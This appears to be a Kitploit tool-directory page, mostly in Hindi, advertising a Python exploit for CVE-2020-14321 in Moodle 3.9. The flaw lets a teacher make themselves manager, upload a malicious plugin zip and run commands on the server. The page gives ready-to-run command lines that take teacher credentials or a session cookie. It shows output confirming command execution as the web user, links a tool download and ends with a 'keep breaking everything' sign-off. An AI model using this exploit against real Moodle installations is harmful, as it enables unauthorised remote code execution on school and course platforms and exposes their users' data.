Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-14321 — CVE-2020-14321 का शोषण करने के लिए Python स्क्रिप्ट - Moodle 3.9 - पाठ्यक्रम नामांकन से शिक्षक भूमिका से प्रबंधक भूमिका में विशेषाधिकार वृद्धि की अनुमति मिलती है, जिससे RCE संभव होता है। | Kitploit
उपकरण/GitHubGitHub/lanzt/cve-2020-14321
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHublanzt/cve-2020-14321

CVE-2020-14321

CVE-2020-14321 का शोषण करने के लिए Python स्क्रिप्ट - Moodle 3.9 - पाठ्यक्रम नामांकन से शिक्षक भूमिका से प्रबंधक भूमिका में विशेषाधिकार वृद्धि की अनुमति मिलती है, जिससे RCE संभव होता है।

रिपॉजिटरी देखें
2134 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Python script to exploit CVE-2020-14321 - Moodle 3.9

कोर्स नामांकन ने शिक्षक भूमिका से प्रबंधक भूमिका में विशेषाधिकार वृद्धि की अनुमति दी, जिससे RCE हो सकता है।

  • कोर्स के शिक्षक स्वयं को उस कोर्स के भीतर प्रबंधक भूमिका निर्धारित कर सकते थे।

पेलोड यहाँ से निकाला गया: https://github.com/HoangKien1020/CVE-2020-14321

उपयोग

यदि आपके पास वैध शिक्षक क्रेडेंशियल्स हैं (InReaLife यह पर्याप्त रूप से परीक्षण नहीं किया गया है, या शायद हाँ, मुझे नहीं पता :P):

root@kitploit:~
❭ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle -u lanz -p 'Lanz123$!'

यदि आपके पास एक वैध शिक्षक कुकी है (101% परीक्षित):

root@kitploit:~
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r

...

root@kitploit:~
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r -c id
 __     __     __   __  __   __              __  __     
/  \  /|_  __   _) /  \  _) /  \ __  /| |__|  _)  _) /| 
\__ \/ |__     /__ \__/ /__ \__/      |    | __) /__  | • by lanz

Moodle 3.9 - Remote Command Execution (Authenticated as teacher)
Course enrolments allowed privilege escalation from teacher role into manager role to RCE
                                                        
[+] Login on site: MoodleSession:th3f7k1ngggk00ci30ft3ach3r ✓
[+] Updating roles to move on manager accout: ✓
[+] Updating rol manager to enable install plugins: ✓
[+] Uploading malicious .zip file: ✓
[+] Executing id: ✓

uid=80(www) gid=80(www) groups=80(www)

Keep breaking ev3rYthiNg!!

टूल डाउनलोड करें